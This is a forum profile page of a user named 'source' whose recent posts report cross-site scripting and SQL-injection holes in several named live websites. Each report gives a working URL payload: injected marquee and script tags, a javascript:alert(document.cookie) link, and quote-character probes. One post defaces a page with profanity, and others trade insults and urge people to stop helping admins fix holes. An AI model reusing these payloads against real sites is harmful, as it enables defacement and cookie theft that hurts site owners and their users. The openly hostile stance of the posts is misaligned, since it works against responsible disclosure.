source

Members
  • Posts

    100
  • Joined

  • Last visited

    Never

Profile Information

  • Gender
    Not Telling

source's Achievements

Newbie

Newbie (1/5)

0

Reputation

  1. http://themespot.info/?page=theme&themeid=%22%3E%3Cmarquee%3Elolz xssssss
  2. http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10 http://www.themafiaman.com/tru/pimp.php?tru=10 both xssable. I can't finish cause some stupid fuck face disabled my account. Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it. Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time. lolz
  3. first hole is in the register on step three if you put ">code as ur last name hit enter it runs. http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer= http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer= http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz http://themafiaman.com/tru/board.php?tru=10&action=post xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>
  4. http://www.cutencuddly.org/letter/index.php?c=%22%3E%3Cbr%3E%3Cbr%3E%3Ch1%3ESource%20Is%201337%3C/h1%3E%3Cmarquee%3Efucked%3C/marquee%3E%3Ch1%3Eweak%20sekurite%20admin xss hole / sql hole
  5. dear admin: your security is a joke. you're not even using sessions.
  6. http://games4uonline.com/mymail/index.php?message=%3Cp%20align=center%3E%3Cfont%20face=Verdana%20size=2%20color=AF0001%3E%22%3E%3Cmarquee%3Eowndage%3C/font%3E%3C/p%3E
  7. If you link to a site that does not exist, it will give you fclose errors or something like that. Try to link to http://www.djaODJSKdjasKDjSKDADjASDK.com
  8. uhm hi i think i just pwnd ur site.. like on every page it says "expecting ending </marquee>" sorry about this roflmaolollercoptter
  9. criminals on the internet are using complex encryption methods..
  10. " I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly. Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less. It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar. " I do not talk down to noobs. I hardly ever write anything besides posting exploits in the site itself. Surely if you did not want another one of my friendly responses you would not have posted, and attempted to troll me. Now if you say I've added nothing to this forum then you are a complete tard and made a false statement in your first line in saying that you read all of my posts. Now, stop trolling me.
  11. "Nice comeback !! lol" If only I *cared* or *liked* any of you. Or respected anyone on these forums, with the exception of one person.
  12. "virtually un crackable despite users pword strength" If you want true security you should be salting and md5ing/sha1 the passwords multiple times. Salt should be different for each user.
  13. "Take a couple of breaths before you freak out. If the OP does not care much about XSS (granted that he shouldn't post here and is wasting everybody's time), his loss. Although I must agree that inserting a marquee is only a tiny exploit. Try stealing a cookie using JavaScript or by loading an external entity (i.e. an image), then he has something to worry about." {snip} If you can use <marquee> you can steal cookies.
  14. same old same old: http://obb.awardspace.com/index.php?page=viewforum&forum=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&row=-1 http://obb.awardspace.com/index.php?page=newreply&forum=2&topic=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&sort='